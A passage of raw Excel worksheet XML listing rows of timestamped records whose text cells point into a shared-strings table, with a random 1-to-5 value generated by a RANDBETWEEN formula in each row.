      <c r="D29256" t="s">
        <v>6</v>
      </c>
      <c r="E29256" s="2" t="s">
        <v>26691</v>
      </c>
      <c r="F29256">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29257" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29257" s="1">
        <v>42824.461273148147</v>
      </c>
      <c r="C29257" t="s">
        <v>10</v>
      </c>
      <c r="D29257" t="s">
        <v>374</v>
      </c>
      <c r="E29257" s="2" t="s">
        <v>26692</v>
      </c>
      <c r="F29257">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29258" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29258" s="1">
        <v>42824.425937499997</v>
      </c>
      <c r="C29258" t="s">
        <v>6</v>
      </c>
      <c r="D29258" t="s">
        <v>114</v>
      </c>
      <c r="E29258" s="2" t="s">
        <v>26693</v>
      </c>
      <c r="F29258">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29259" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29259" s="1">
        <v>42824.41337962963</v>
      </c>
      <c r="C29259" t="s">
        <v>71</v>
      </c>
      <c r="E29259" s="2" t="s">
        <v>26694</v>
      </c>
      <c r="F29259">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29260" s="1">
        <v>42824.400034722225</v>
      </c>
      <c r="C29260" t="s">
        <v>10</v>
      </c>
      <c r="D29260" t="s">
        <v>163</v>
      </c>
      <c r="E29260" t="s">
        <v>26695</v>
      </c>
      <c r="F29260">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29261" s="1">
        <v>42824.400023148148</v>
      </c>
      <c r="C29261" t="s">
        <v>841</v>
      </c>
      <c r="E29261" t="s">
        <v>26696</v>
      </c>
      <c r="F29261">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29262" s="1">
        <v>42824.389201388891</v>
      </c>
      <c r="C29262" t="s">
        <v>10</v>
      </c>
      <c r="D29262" t="s">
        <v>163</v>
      </c>
      <c r="E29262" t="s">
        <v>26697</v>
      </c>
      <c r="F29262">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29263" s="1">
        <v>42824.386608796296</v>
      </c>
      <c r="C29263" t="s">
        <v>48</v>
      </c>
      <c r="E29263" t="s">
        <v>26698</v>
      </c>
      <c r="F29263">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29264" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A29264" s="1">
        <v>42824.328611111108</v>
      </c>
      <c r="C29264" t="s">
        <v>103</v>
      </c>
      <c r="E29264" s="2" t="s">
        <v>26699</v>
      </c>
      <c r="F29264">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29265" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A29265" s="1">
        <v>42824.314386574071</v>
      </c>
      <c r="C29265" t="s">
        <v>41</v>
      </c>
      <c r="E29265" s="2" t="s">
        <v>26700</v>
      </c>
      <c r="F29265">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29266" s="1">
        <v>42824.293067129627</v>
      </c>
      <c r="C29266" t="s">
        <v>41</v>
      </c>
      <c r="E29266" t="s">
        <v>26701</v>
      </c>
      <c r="F29266">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29267" s="1">
        <v>42824.293055555558</v>
      </c>
      <c r="C29267" t="s">
        <v>41</v>
      </c>
      <c r="E29267" t="s">
        <v>26701</v>
      </c>
      <c r="F29267">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29268" s="1">
        <v>42824.274444444447</v>
      </c>
      <c r="C29268" t="s">
        <v>454</v>
      </c>
      <c r="E29268" t="s">
        <v>26702</v>
      </c>
      <c r="F29268">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29269" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29269" s="1">
        <v>42824.27412037037</v>
      </c>
      <c r="C29269" t="s">
        <v>318</v>
      </c>
      <c r="E29269" s="2" t="s">
        <v>26703</v>
      </c>
      <c r="F29269">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29270" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29270" s="1">
        <v>42824.271736111114</v>
      </c>
      <c r="C29270" t="s">
        <v>65</v>
      </c>
      <c r="E29270" s="2" t="s">
        <v>26704</v>
      </c>
      <c r="F29270">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29271" s="1">
        <v>42824.264513888891</v>
      </c>
      <c r="C29271" t="s">
        <v>43</v>
      </c>
      <c r="E29271" t="s">
        <v>26705</v>
      </c>
      <c r="F29271">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29272" s="1">
        <v>42824.263240740744</v>
      </c>
      <c r="C29272" t="s">
        <v>43</v>
      </c>
      <c r="E29272" t="s">
        <v>26706</v>
      </c>
      <c r="F29272">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29273" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29273" s="1">
        <v>42824.108761574076</v>
      </c>
      <c r="C29273" t="s">
        <v>3443</v>
      </c>
      <c r="E29273" s="2" t="s">
        <v>26707</v>
      </c>
      <c r="F29273">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29274" s="1">
        <v>42823.988518518519</v>
      </c>
      <c r="C29274" t="s">
        <v>10</v>
      </c>
      <c r="D29274" t="s">
        <v>6</v>
      </c>
      <c r="E29274" t="s">
        <v>26708</v>
      </c>
      <c r="F29274">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29275" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29275" s="1">
        <v>42823.884108796294</v>
      </c>
      <c r="C29275" t="s">
        <v>10</v>
      </c>
      <c r="D29275" t="s">
        <v>80</v>
      </c>
      <c r="E29275" s="2" t="s">
        <v>26709</v>
      </c>
      <c r="F29275">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29276" s="1">
        <v>42823.881516203706</v>
      </c>
      <c r="C29276" t="s">
        <v>41</v>
      </c>
      <c r="E29276" t="s">
        <v>26710</v>
      </c>
      <c r="F29276">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29277" s="1">
        <v>42823.866828703707</v>
      </c>
      <c r="C29277" t="s">
        <v>6</v>
      </c>
      <c r="D29277" t="s">
        <v>25</v>
      </c>
      <c r="E29277" t="s">
        <v>26711</v>
      </c>
      <c r="F29277">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29278" s="1">
        <v>42823.815011574072</v>
      </c>
      <c r="C29278" t="s">
        <v>10</v>
      </c>
      <c r="D29278" t="s">
        <v>1056</v>
      </c>
      <c r="E29278" t="s">
        <v>26712</v>
      </c>
      <c r="F29278">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29279" s="1">
        <v>42823.807824074072</v>
      </c>
      <c r="C29279" t="s">
        <v>197</v>
      </c>
      <c r="F29279">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29280" s="1">
        <v>42823.726736111108</v>
      </c>
      <c r="C29280" t="s">
        <v>10</v>
      </c>
      <c r="D29280" t="s">
        <v>17</v>
      </c>
      <c r="E29280" t="s">
        <v>26713</v>
      </c>
      <c r="F29280">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29281" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29281" s="1">
        <v>42823.698611111111</v>
      </c>
      <c r="C29281" t="s">
        <v>10</v>
      </c>
      <c r="D29281" t="s">
        <v>271</v>
      </c>
      <c r="E29281" s="2" t="s">
        <v>26714</v>
      </c>
      <c r="F29281">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29282" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29282" s="1">
        <v>42823.686990740738</v>
      </c>
      <c r="C29282" t="s">
        <v>6</v>
      </c>
      <c r="D29282" t="s">
        <v>25</v>
      </c>
      <c r="E29282" s="2" t="s">
        <v>26715</v>
      </c>
      <c r="F29282">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29283" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29283" s="1">
        <v>42823.672037037039</v>
      </c>
      <c r="C29283" t="s">
        <v>10</v>
      </c>
      <c r="D29283" t="s">
        <v>244</v>
      </c>
      <c r="E29283" s="2" t="s">
        <v>26716</v>
      </c>
      <c r="F29283">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29284" s="1">
        <v>42823.644155092596</v>
      </c>
      <c r="C29284" t="s">
        <v>10</v>
      </c>
      <c r="D29284" t="s">
        <v>151</v>
      </c>
      <c r="E29284" t="s">
        <v>26717</v>
      </c>
      <c r="F29284">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29285" s="1">
        <v>42823.643425925926</v>
      </c>
      <c r="C29285" t="s">
        <v>10</v>
      </c>
      <c r="D29285" t="s">
        <v>158</v>
      </c>
      <c r="E29285" t="s">
        <v>26718</v>
      </c>
      <c r="F29285">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29286" s="1">
        <v>42823.610925925925</v>
      </c>
      <c r="C29286" t="s">
        <v>48</v>
      </c>
      <c r="E29286" t="s">
        <v>26719</v>
      </c>
      <c r="F29286">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29287" s="1">
        <v>42823.603344907409</v>
      </c>
      <c r="C29287" t="s">
        <v>10</v>
      </c>
      <c r="D29287" t="s">
        <v>20</v>
      </c>
      <c r="E29287" t="s">
        <v>26720</v>
      </c>
      <c r="F29287">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29288" s="1">
        <v>42823.598217592589</v>
      </c>
      <c r="C29288" t="s">
        <v>6</v>
      </c>
      <c r="D29288" t="s">
        <v>194</v>
      </c>
      <c r="E29288" t="s">
        <v>26721</v>
      </c>
      <c r="F29288">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29289" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29289" s="1">
        <v>42823.552245370367</v>
      </c>
      <c r="C29289" t="s">
        <v>10</v>
      </c>
      <c r="D29289" t="s">
        <v>56</v>
      </c>
      <c r="E29289" s="2" t="s">
        <v>26722</v>
      </c>
      <c r="F29289">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29290" s="1">
        <v>42823.541817129626</v>
      </c>
      <c r="C29290" t="s">
        <v>10</v>
      </c>
      <c r="D29290" t="s">
        <v>6</v>
      </c>
      <c r="E29290" t="s">
        <v>26723</v>
      </c>
      <c r="F29290">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29291" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29291" s="1">
        <v>42823.541516203702</v>
      </c>
      <c r="C29291" t="s">
        <v>6</v>
      </c>
      <c r="D29291" t="s">
        <v>25</v>
      </c>
      <c r="E29291" s="2" t="s">
        <v>26724</v>
      </c>
      <c r="F29291">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29292" s="1">
        <v>42823.505324074074</v>
      </c>
      <c r="C29292" t="s">
        <v>10</v>
      </c>
      <c r="D29292" t="s">
        <v>52</v>
      </c>
      <c r="F29292">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29293" s="1">
        <v>42823.50267361111</v>
      </c>
      <c r="C29293" t="s">
        <v>10</v>
      </c>
      <c r="D29293" t="s">
        <v>56</v>
      </c>
      <c r="E29293" t="s">
        <v>26725</v>
      </c>
      <c r="F29293">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29294" s="1">
        <v>42823.494201388887</v>
      </c>
      <c r="C29294" t="s">
        <v>10</v>
      </c>
      <c r="D29294" t="s">
        <v>20</v>
      </c>
      <c r="E29294" t="s">
        <v>26726</v>
      </c>
      <c r="F29294">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29295" s="1">
        <v>42823.492280092592</v>
      </c>
      <c r="C29295" t="s">
        <v>10</v>
      </c>
      <c r="D29295" t="s">
        <v>6</v>
      </c>
      <c r="E29295" t="s">
        <v>26727</v>
      </c>
      <c r="F29295">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29296" s="1">
        <v>42823.487395833334</v>
      </c>
      <c r="C29296" t="s">
        <v>10</v>
      </c>
      <c r="D29296" t="s">
        <v>163</v>
      </c>
      <c r="E29296" t="s">
        <v>26728</v>
      </c>
      <c r="F29296">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29297" s="1">
        <v>42823.482905092591</v>
      </c>
      <c r="C29297" t="s">
        <v>48</v>
      </c>
      <c r="E29297" t="s">
        <v>26729</v>
      </c>
      <c r="F29297">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29298" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A29298" s="1">
        <v>42823.48170138889</v>
      </c>
      <c r="C29298" t="s">
        <v>10</v>
      </c>
      <c r="D29298" t="s">
        <v>36</v>
      </c>
      <c r="E29298" s="2" t="s">
        <v>26730</v>
      </c>
      <c r="F29298">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29299" s="1">
        <v>42823.480185185188</v>
      </c>
      <c r="C29299" t="s">
        <v>10</v>
      </c>
      <c r="D29299" t="s">
        <v>667</v>
      </c>
      <c r="E29299" t="s">
        <v>26731</v>
      </c>
      <c r="F29299">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29300" s="1">
        <v>42823.477534722224</v>
      </c>
      <c r="C29300" t="s">
        <v>10</v>
      </c>
      <c r="D29300" t="s">
        <v>6</v>
      </c>
      <c r="E29300" t="s">
        <v>26732</v>
      </c>
      <c r="F29300">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29301" s="1">
        <v>42823.462777777779</v>
      </c>
      <c r="C29301" t="s">
        <v>10</v>
      </c>
      <c r="D29301" t="s">
        <v>23</v>
      </c>
      <c r="E29301" t="s">
        <v>26733</v>
      </c>
      <c r="F29301">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29302" s="1">
        <v>42823.452534722222</v>
      </c>
      <c r="C29302" t="s">
        <v>10</v>
      </c>
      <c r="D29302" t="s">
        <v>163</v>
      </c>
      <c r="E29302" t="s">
        <v>26734</v>
      </c>
      <c r="F29302">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29303" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29303" s="1">
        <v>42823.423449074071</v>
      </c>
      <c r="C29303" t="s">
        <v>16</v>
      </c>
      <c r="E29303" s="2" t="s">
        <v>26735</v>
      </c>
      <c r="F29303">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29304" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29304" s="1">
        <v>42823.417685185188</v>
      </c>
      <c r="C29304" t="s">
        <v>6</v>
      </c>
      <c r="D29304" t="s">
        <v>194</v>
      </c>
      <c r="E29304" s="2" t="s">
        <v>26736</v>
      </c>
      <c r="F29304">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29305" s="1">
        <v>42823.404398148145</v>
      </c>
      <c r="C29305" t="s">
        <v>73</v>
      </c>
      <c r="E29305" t="s">
        <v>26737</v>
      </c>
      <c r="F29305">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29306" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29306" s="1">
        <v>42823.403796296298</v>
      </c>
      <c r="C29306" t="s">
        <v>10</v>
      </c>
      <c r="D29306" t="s">
        <v>36</v>
      </c>
      <c r="E29306" s="2" t="s">
        <v>26738</v>
      </c>
      <c r="F29306">
        <f t="shared" ca="1" si="457"/>
        <v>4</v>
      </c>
    </row>
    <row r="29307" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29307" s="1">
        <v>42823.401342592595</v>
      </c>
      <c r="C29307" t="s">
        <v>10</v>
      </c>
      <c r="D29307" t="s">
        <v>112</v>
      </c>
      <c r="E29307" s="2" t="s">
        <v>26739</v>
      </c>
      <c r="F29307">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29308" s="1">
        <v>42823.399953703702</v>
      </c>
      <c r="C29308" t="s">
        <v>48</v>
      </c>
      <c r="E29308" t="s">
        <v>26740</v>
      </c>
      <c r="F29308">
        <f t="shared" ca="1" si="457"/>
        <v>5</v>
      </c>
    </row>
    <row r="29309" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29309" s="1">
        <v>42823.332997685182</v>
      </c>
      <c r="C29309" t="s">
        <v>430</v>
      </c>
      <c r="E29309" s="2" t="s">
        <v>26741</v>
      </c>
      <c r="F29309">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29310" s="1">
        <v>42823.264745370368</v>
      </c>
      <c r="C29310" t="s">
        <v>41</v>
      </c>
      <c r="E29310" t="s">
        <v>26742</v>
      </c>
      <c r="F29310">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29311" s="1">
        <v>42823.21234953704</v>
      </c>
      <c r="C29311" t="s">
        <v>253</v>
      </c>
      <c r="E29311" t="s">
        <v>26743</v>
      </c>
      <c r="F29311">
        <f t="shared" ca="1" si="457"/>
        <v>1</v>
      </c>
    </row>
    <row r="29312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29312" s="1">
        <v>42823.212141203701</v>
      </c>
      <c r="C29312" t="s">
        <v>1130</v>
      </c>
      <c r="F29312">
        <f t="shared" ca="1" si="457"/>
        <v>3</v>
      </c>
    </row>
    <row r="29313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29313" s="1">
        <v>42823.198854166665</v>
      </c>
      <c r="C29313" t="s">
        <v>140</v>
      </c>
      <c r="E29313" t="s">
        <v>26744</v>
      </c>
      <c r="F29313">
        <f t="shared" ca="1" si="457"/>
        <v>2</v>
      </c>
    </row>
    <row r="29314" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A29314" s="1">
        <v>42823.160520833335</v>
      </c>
      <c r="C29314" t="s">
        <v>318</v>
      </c>
      <c r="E29314" s="2" t="s">
        <v>26745</v>
      </c>
      <c r="F29314">
        <f t="shared" ref="F29314:F29377" ca="1" si="458">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="29315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29315" s="1">
        <v>42823.044733796298</v>
      </c>
      <c r="C29315" t="s">
        <v>41</v>
      </c>
      <c r="E29315" t="s">
        <v>26746</v>
      </c>
      <c r="F29315">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29316" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29316" s="1">
        <v>42823.018969907411</v>
      </c>
      <c r="C29316" t="s">
        <v>253</v>
      </c>
      <c r="E29316" s="2" t="s">
        <v>26747</v>
      </c>
      <c r="F29316">
        <f t="shared" ca="1" si="458"/>
        <v>3</v>
      </c>
    </row>
    <row r="29317" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29317" s="1">
        <v>42823.005023148151</v>
      </c>
      <c r="C29317" t="s">
        <v>10</v>
      </c>
      <c r="D29317" t="s">
        <v>6</v>
      </c>
      <c r="E29317" s="2" t="s">
        <v>26748</v>
      </c>
      <c r="F29317">
        <f t="shared" ca="1" si="458"/>
        <v>1</v>
      </c>
    </row>
    <row r="29318" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A29318" s="1">
        <v>42822.942361111112</v>
      </c>
      <c r="C29318" t="s">
        <v>139</v>
      </c>
      <c r="E29318" s="2" t="s">
        <v>26749</v>
      </c>
      <c r="F29318">
        <f t="shared" ca="1" si="458"/>
        <v>1</v>
      </c>
    </row>
    <row r="29319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29319" s="1">
        <v>42822.929768518516</v>
      </c>
      <c r="C29319" t="s">
        <v>10</v>
      </c>
      <c r="D29319" t="s">
        <v>107</v>
      </c>
      <c r="E29319" t="s">
        <v>26750</v>
      </c>
      <c r="F29319">
        <f t="shared" ca="1" si="458"/>
        <v>5</v>
      </c>
    </row>
    <row r="29320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29320" s="1">
        <v>42822.777824074074</v>
      </c>
      <c r="C29320" t="s">
        <v>10</v>
      </c>
      <c r="D29320" t="s">
        <v>52</v>
      </c>
      <c r="E29320" t="s">
        <v>26751</v>
      </c>
      <c r="F29320">
        <f t="shared" ca="1" si="458"/>
        <v>5</v>
      </c>
    </row>
    <row r="29321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29321" s="1">
        <v>42822.75576388889</v>
      </c>
      <c r="C29321" t="s">
        <v>10</v>
      </c>
      <c r="D29321" t="s">
        <v>721</v>
      </c>
      <c r="E29321" t="s">
        <v>26752</v>
      </c>
      <c r="F29321">
        <f t="shared" ca="1" si="458"/>
        <v>5</v>
      </c>
    </row>
    <row r="29322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29322" s="1">
        <v>42822.753368055557</v>
      </c>
      <c r="C29322" t="s">
        <v>10</v>
      </c>
      <c r="D29322" t="s">
        <v>6</v>
      </c>
      <c r="E29322" t="s">
        <v>26753</v>
      </c>
      <c r="F29322">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29323" s="1">
        <v>42822.74795138889</v>
      </c>
      <c r="C29323" t="s">
        <v>10</v>
      </c>
      <c r="D29323" t="s">
        <v>36</v>
      </c>
      <c r="E29323" t="s">
        <v>26754</v>
      </c>
      <c r="F29323">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29324" s="1">
        <v>42822.743101851855</v>
      </c>
      <c r="C29324" t="s">
        <v>10</v>
      </c>
      <c r="D29324" t="s">
        <v>6</v>
      </c>
      <c r="F29324">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29325" s="1">
        <v>42822.691666666666</v>
      </c>
      <c r="C29325" t="s">
        <v>41</v>
      </c>
      <c r="E29325" t="s">
        <v>26755</v>
      </c>
      <c r="F29325">
        <f t="shared" ca="1" si="458"/>
        <v>3</v>
      </c>
    </row>
    <row r="29326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29326" s="1">
        <v>42822.687013888892</v>
      </c>
      <c r="C29326" t="s">
        <v>6</v>
      </c>
      <c r="D29326" t="s">
        <v>25</v>
      </c>
      <c r="F29326">
        <f t="shared" ca="1" si="458"/>
        <v>4</v>
      </c>
    </row>
    <row r="29327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29327" s="1">
        <v>42822.673819444448</v>
      </c>
      <c r="C29327" t="s">
        <v>6</v>
      </c>
      <c r="D29327" t="s">
        <v>25</v>
      </c>
      <c r="E29327" t="s">
        <v>26756</v>
      </c>
      <c r="F29327">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29328" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A29328" s="1">
        <v>42822.65415509259</v>
      </c>
      <c r="C29328" t="s">
        <v>10</v>
      </c>
      <c r="D29328" t="s">
        <v>36</v>
      </c>
      <c r="E29328" s="2" t="s">
        <v>26730</v>
      </c>
      <c r="F29328">
        <f t="shared" ca="1" si="458"/>
        <v>4</v>
      </c>
    </row>
    <row r="29329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29329" s="1">
        <v>42822.614710648151</v>
      </c>
      <c r="C29329" t="s">
        <v>6</v>
      </c>
      <c r="D29329" t="s">
        <v>25</v>
      </c>
      <c r="E29329" t="s">
        <v>26757</v>
      </c>
      <c r="F29329">
        <f t="shared" ca="1" si="458"/>
        <v>3</v>
      </c>
    </row>
    <row r="29330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29330" s="1">
        <v>42822.589745370373</v>
      </c>
      <c r="C29330" t="s">
        <v>10</v>
      </c>
      <c r="D29330" t="s">
        <v>381</v>
      </c>
      <c r="E29330" t="s">
        <v>26758</v>
      </c>
      <c r="F29330">
        <f t="shared" ca="1" si="458"/>
        <v>5</v>
      </c>
    </row>
    <row r="29331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29331" s="1">
        <v>42822.585972222223</v>
      </c>
      <c r="C29331" t="s">
        <v>10</v>
      </c>
      <c r="D29331" t="s">
        <v>23</v>
      </c>
      <c r="E29331" t="s">
        <v>26759</v>
      </c>
      <c r="F29331">
        <f t="shared" ca="1" si="458"/>
        <v>2</v>
      </c>
    </row>
    <row r="29332" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29332" s="1">
        <v>42822.551527777781</v>
      </c>
      <c r="C29332" t="s">
        <v>6</v>
      </c>
      <c r="D29332" t="s">
        <v>25</v>
      </c>
      <c r="E29332" s="2" t="s">
        <v>26760</v>
      </c>
      <c r="F29332">
        <f t="shared" ca="1" si="458"/>
        <v>3</v>
      </c>
    </row>
    <row r="29333" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29333" s="1">
        <v>42822.551249999997</v>
      </c>
      <c r="C29333" t="s">
        <v>7419</v>
      </c>
      <c r="E29333" s="2" t="s">
        <v>26760</v>
      </c>
      <c r="F29333">
        <f t="shared" ca="1" si="458"/>
        <v>4</v>
      </c>
    </row>
    <row r="29334" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29334" s="1">
        <v>42822.535462962966</v>
      </c>
      <c r="C29334" t="s">
        <v>10</v>
      </c>
      <c r="D29334" t="s">
        <v>36</v>
      </c>
      <c r="E29334" s="2" t="s">
        <v>26761</v>
      </c>
      <c r="F29334">
        <f t="shared" ca="1" si="458"/>
        <v>4</v>
      </c>
    </row>
    <row r="29335" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29335" s="1">
        <v>42822.526377314818</v>
      </c>
      <c r="C29335" t="s">
        <v>10</v>
